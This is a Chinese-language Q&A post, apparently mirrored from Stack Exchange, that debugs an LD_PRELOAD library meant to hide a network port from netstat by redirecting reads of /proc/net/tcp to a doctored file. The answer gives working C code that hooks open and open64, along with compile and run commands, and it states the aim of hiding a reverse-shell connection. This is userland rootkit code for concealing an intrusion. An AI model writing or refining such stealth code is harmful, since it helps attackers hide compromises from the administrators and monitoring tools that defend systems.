基于LD_PRELOAD重写open函数实现端口隐藏失效排查
解决LD_PRELOAD重写open无法隐藏netstat端口的问题
问题描述
已通过LD_PRELOAD重写readdir实现进程隐藏,现在尝试重写open函数,让netstat读取预先处理好的不含目标端口的文件/home/kali/Malware/project/hide_port/tcp,而非系统的/proc/net/tcp。编译生成libnetstat_hide.so后,执行LD_PRELOAD=./libnetstat_hide.so netstat仍能看到目标连接,需要排查并解决该问题。
原代码如下:
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <dlfcn.h> #include <string.h> #include <fcntl.h> #include <unistd.h> static int (*original_open)(const char *pathname, int flags, ...) = NULL; static int redirected_fd = -1; int open(const char *pathname, int flags, ...) { // Load the original open function if not loaded if (!original_open) { original_open = dlsym(RTLD_NEXT, "open"); if (!original_open) { fprintf(stderr, "Error: Unable to load original open function\n"); return -1; } } // Check if the file being opened is /proc/net/tcp if (strcmp(pathname, "/proc/net/tcp") == 0) { // If not already redirected, open the new file if (redirected_fd == -1) { redirected_fd = original_open("/home/kali/Malware/project/hide_port/tcp", O_RDONLY); if (redirected_fd == -1) { fprintf(stderr, "Error: Unable to open /home/kali/Malware/project/hide_port/tcp\n"); return -1; } } // Return the redirected file descriptor return redirected_fd; } else { // Call the original open function for other files return original_open(pathname, flags); } }
编译命令:
gcc -shared -fPIC -o libnetstat_hide.so hide_sshd.c -ldl
问题分析
原代码存在三个关键问题:
- 静态文件描述符复用错误:
redirected_fd是静态变量,第一次打开替代文件后,后续所有open调用都返回同一个fd。当netstat关闭该fd后,此fd变为无效,后续调用会返回已关闭的fd,导致netstat回退读取原始/proc/net/tcp。 - 可变参数处理缺失:
open函数有两种原型(带或不带mode参数),原代码直接忽略可变参数,调用原始open时可能传递错误参数,导致调用失败。 - 未兼容64位open函数:多数现代程序(包括
netstat)会使用open64而非open来支持大文件,原代码未hook该函数,导致netstat绕过hook直接读取原始文件。
修复方案
针对上述问题,修改代码如下:
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <dlfcn.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <stdarg.h> // 定义原始函数指针 static int (*original_open)(const char *pathname, int flags, ...) = NULL; static int (*original_open64)(const char *pathname, int flags, ...) = NULL; // 处理open函数的通用逻辑 static int handle_open(const char *pathname, int flags, va_list ap) { // 检查是否需要重定向到自定义tcp文件 if (strcmp(pathname, "/proc/net/tcp") == 0) { // 每次打开都重新打开自定义文件,避免fd复用问题 return original_open("/home/kali/Malware/project/hide_port/tcp", O_RDONLY); } // 处理原始open的可变参数 if (flags & O_CREAT) { mode_t mode = va_arg(ap, mode_t); return original_open(pathname, flags, mode); } else { return original_open(pathname, flags); } } // Hook open函数 int open(const char *pathname, int flags, ...) { if (!original_open) { original_open = dlsym(RTLD_NEXT, "open"); if (!original_open) { fprintf(stderr, "Failed to load original open: %s\n", dlerror()); return -1; } } va_list ap; va_start(ap, flags); int ret = handle_open(pathname, flags, ap); va_end(ap); return ret; } // Hook open64函数 int open64(const char *pathname, int flags, ...) { if (!original_open64) { original_open64 = dlsym(RTLD_NEXT, "open64"); if (!original_open64) { fprintf(stderr, "Failed to load original open64: %s\n", dlerror()); return -1; } } // 对于open64,同样重定向到自定义tcp文件 if (strcmp(pathname, "/proc/net/tcp") == 0) { return original_open64("/home/kali/Malware/project/hide_port/tcp", O_RDONLY); } // 处理可变参数 va_list ap; va_start(ap, flags); int ret; if (flags & O_CREAT) { mode_t mode = va_arg(ap, mode_t); ret = original_open64(pathname, flags, mode); } else { ret = original_open64(pathname, flags); } va_end(ap); return ret; }
编译命令
gcc -shared -fPIC -o libnetstat_hide.so hide_sshd.c -ldl
验证步骤
- 确保
/home/kali/Malware/project/hide_port/tcp文件已正确生成,且确实不含目标端口的行。 - 执行以下命令测试:
LD_PRELOAD=./libnetstat_hide.so netstat -antp
此时应看不到目标反向Shell的端口连接。
内容的提问来源于stack exchange,提问作者Andreas Frangos
相关产品推荐
相关产品推荐

